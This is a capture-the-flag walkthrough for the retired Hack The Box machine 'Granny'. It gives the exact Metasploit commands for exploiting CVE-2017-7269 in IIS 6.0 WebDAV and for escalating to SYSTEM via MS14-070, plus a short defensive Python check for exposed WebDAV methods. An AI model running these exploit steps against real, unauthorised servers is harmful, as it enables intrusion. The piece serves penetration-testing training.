Keep Calm and Hack The Box - Granny

Hack The Box (HTB) is an online platform that allows you to test your penetration testing skills. It contains several challenges that are constantly updated. Some of them are simulating real world scenarios and some of them lean more towards a CTF style of challenge.

Note. Only write-ups of retired HTB machines are allowed.

Granny, similarly to Grandpa, can be exploited using several different methods like the widely-exploited CVE-2017-7269. This vulnerability is trivial to exploit and granted immediate access to thousands of IIS servers around the globe when it became public knowledge.

We will use the following tools to pwn the box from a Kali Linux machine:

  • nmap
  • Searchsploit
  • davtest
  • Metasploit
  • Local exploit suggester

Let's get started.

I add granny to the /etc/hosts file

nano /etc/hosts

with

10.10.10.15     granny.htb

Step 1 - Reconnaissance

The first step before exploiting a machine is to do a little bit of scanning and reconnaissance.

This is one of the most important parts as it will determine what you can try to exploit afterwards. It is always better to spend more time on this phase to get as much information as you can.

Port scanning

I will use Nmap (Network Mapper). Nmap is a free and open source utility for network discovery and security auditing. It uses raw IP packets to determine what hosts are available on the network, what services those hosts are offering, what operating systems they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

There are many commands you can use with this tool to scan the network. If you want to learn more about it, you can have a look at the documentation here.

I use the following command to perform an intensive scan:

nmap -A -v granny.htb

-A: Enable OS detection, version detection, script scanning, and traceroute

-v: Increase verbosity level

granny.htb: hostname for the Granny box

If you find the results a little bit too overwhelming, you can run another command to get only the open ports.

nmap granny.htb

We can see that there is only 1 open port:

Port 80, most often used by Hypertext Transfer Protocol (HTTP)

We know that the server is an IIS 6.0 from the http-server-header. Internet Information Services (IIS, formerly Internet Information Server) is an extensible web server software created by Microsoft for use with the Windows NT family. More info here.

IIS 6.0 (code name "Duct Tape"), included with Windows Server 2003 and Windows XP Professional x64 Edition, added support for IPv6 and included a new worker process model that increased security as well as reliability. HTTP.sys was introduced in IIS 6.0 as an HTTP-specific protocol listener for HTTP requests.

We can also see from the http-title that the website is "under construction" and that there is an http-webdav-scan section listing all the allowed methods.

I use another nmap script to try to get more information. The script sends an OPTIONS request which lists the dav type, server type, date and allowed methods. It then sends a PROPFIND request and tries to fetch exposed directories and internal IP addresses by doing pattern matching in the response body.

nmap --script http-webdav-scan -p80 granny.htb

Here is more info on this script from the nmap website.

WebDAV or Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. More info here.

We can see on the server support section that Microsoft's IIS has a WebDAV module.
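As an added example (not part of the original write-up), here is a small Python check that parses a captured OPTIONS response the way the nmap script reads it and reports what a defender would act on: the IIS version from the Server header, whether the DAV header is present, and which WebDAV write methods are exposed. The sample response is constructed to resemble an IIS 6.0 host with WebDAV enabled; the function names are my own.

```python
import re

# Constructed sample: an OPTIONS response shaped like an IIS 6.0 host with WebDAV on.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "DAV: 1, 2\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n\r\n"
)

# WebDAV verbs that let a client modify content or locks on the server.
DAV_WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH", "LOCK", "UNLOCK"}


def parse_headers(raw):
    """Return {lower-case name: value} for the header block of a raw HTTP response."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def allowed_methods(headers):
    return {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}


def iis_version(headers):
    m = re.match(r"Microsoft-IIS/(\d+\.\d+)", headers.get("server", ""))
    return m.group(1) if m else None


def assess(raw):
    """Turn one OPTIONS response into a list of findings a defender should act on."""
    headers = parse_headers(raw)
    version = iis_version(headers)
    dav_on = "dav" in headers
    risky = sorted(allowed_methods(headers) & DAV_WRITE_METHODS)
    findings = []
    if version and float(version) < 7.0:
        findings.append(f"IIS {version} is end-of-life; its WebDAV module is affected by CVE-2017-7269")
    if dav_on:
        findings.append("WebDAV is enabled (DAV header present); disable the module if not required")
    if risky:
        findings.append("WebDAV write methods exposed: " + ", ".join(risky))
    return {"version": version, "webdav": dav_on, "risky_methods": risky, "findings": findings}


if __name__ == "__main__":
    for finding in assess(SAMPLE_RESPONSE)["findings"]:
        print("-", finding)
```

A response captured with `curl -i -X OPTIONS` against your own server can be fed to assess() in the same way; on IIS the remediation is to remove the WebDAV module wherever it is not genuinely needed.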

I use davtest to check if I can upload files.

I use the following command:

davtest -url granny.htb

It doesn't look like I can upload files. I use Searchsploit to check if there is any known vulnerability on IIS 6.0. Searchsploit is a command line search tool for Exploit Database.

I use the following command:

searchsploit iis 6.0

I can get more details on the exploit with:

searchsploit -x 41738.py

The attack is based on a Return-oriented programming chain. Return-oriented programming (ROP) is a security exploit technique that allows an attacker to execute code in the presence of security defense such as executable space protection and code signing.

You can also check the Exploit Database to find the exploit.

The National Vulnerability Database and the Common Vulnerabilities and Exposures database are also worth checking.

There is one Metasploit module available.

Step 2 - Visiting the website

We don't see much when visiting the website. From the developer console, we can see it's powered by the ASP.NET framework.

We will use Metasploit, which is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders.

I launch the Metasploit Framework on Kali and look for the command I should use to launch the exploit.

If I use this command

searchsploit iis 6.0

I get the same table that I had from the Terminal earlier.

If I type

search iis 6.0

I get 174 results.

The exploit I'm interested in is number 147 on this list.

If you want to get more information about the exploit, you can use the following command:

info exploit/windows/iis/iis_webdav_scstoragepathfromurl

I use the following command to use the exploit:

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

I need to set up the options before launching the exploit. I check the options with

show options

I set the RHOSTS with the following command:

set RHOSTS granny.htb

When I check again the options, I get this:

I check if the target is vulnerable with

check

Then I run the exploit with the command

exploit

And I get a Meterpreter session.

Here's the definition of Meterpreter from Offensive Security:

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.

You can read more about Meterpreter here.

Let's start by gathering some information.

getuid returns the real user ID of the calling process. The session I got doesn't seem to have enough privileges to run this command. Access is denied:

When this happens, I list the running processes with

ps

and pick one running NT AUTHORITY\NETWORK SERVICE

I migrate to the process 792 with

migrate 792

Now when I check getuid, I get

Server username: NT AUTHORITY\NETWORK SERVICE

This is the session I got after migrating to another process.

I type the following command to get a standard shell on the target system:

shell

I check who I am on the machine with the command

whoami

I get more information from the machine with

systeminfo

I navigate to C:\

then Documents and Settings with

cd "Documents and Settings"

I can see two users – Administrator and Lakis. I try to navigate to Lakis. Access is denied. Same for the administrator folder – which is expected as I don't have root access yet.

I exit the shell with the command

exit

Step 3 - Using the local exploit suggester

I run the local exploit suggester. The exploits are suggested based on the architecture and the platform the user has the shell open in, along with the available exploits in meterpreter.

run post/multi/recon/local_exploit_suggester

I will use the MS14-070 exploit. I look for some more information on Metasploit with

info exploit/windows/local/ms14_070_tcpip_ioctl

as well as on the Rapid7 website.

Step 4 - Using MS14-070 to perform privilege escalation

I put this session in the background with the command

background

I run the following command to use the exploit I found

use exploit/windows/local/ms14_070_tcpip_ioctl

I then check for the options of this exploit

I set the session with

set SESSION 1

I run the exploit with

run

The exploit succeeded, but I didn't get a shell back. I check the options

and set the LHOST to my IP with

set LHOST 10.10.14.36

You can check yours here.

I then run the exploit with

exploit

This confirms that the exploit has succeeded, but I still don't get a shell. I check the session with

sessions -l

I should have

NT AUTHORITY\SYSTEM

Which is not the case now, so I go back to this session with

sessions -i 1

I check getuid and get NT AUTHORITY\SYSTEM back. I get a standard shell on the target system and check who am I on the machine. I get NT AUTHORITY\NETWORK SERVICE back, which is not what I want!

I exit this shell and check the processes. I can see that I have admin access on the machine. I just need to migrate to another process, which I do with

migrate 408

I'm back to the standard shell on the target system. And when I check who I am on the machine, I'm finally an admin!

Step 5 - Looking for the user.txt flag

I navigate to the Lakis folder from Documents and Settings.

I can list all the files/folders with the following command

dir

I then move to the Desktop

And I find the user flag! I can check the contents of the file with

type user.txt

Step 6 - Looking for the root.txt flag

Let's find the root flag now! I navigate up to Users and go into the Administrator/Desktop folder. I find the flag!

I use the following command to see the content of the file

type root.txt

Congrats! You found both flags!

Please don’t hesitate to comment, ask questions or share with your friends :)

You can see more of my articles here.

You can follow me on Twitter or on LinkedIn.

And don't forget to #GetSecure, #BeSecure & #StaySecure!

Other Hack The Box articles

Translated from: https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-granny/
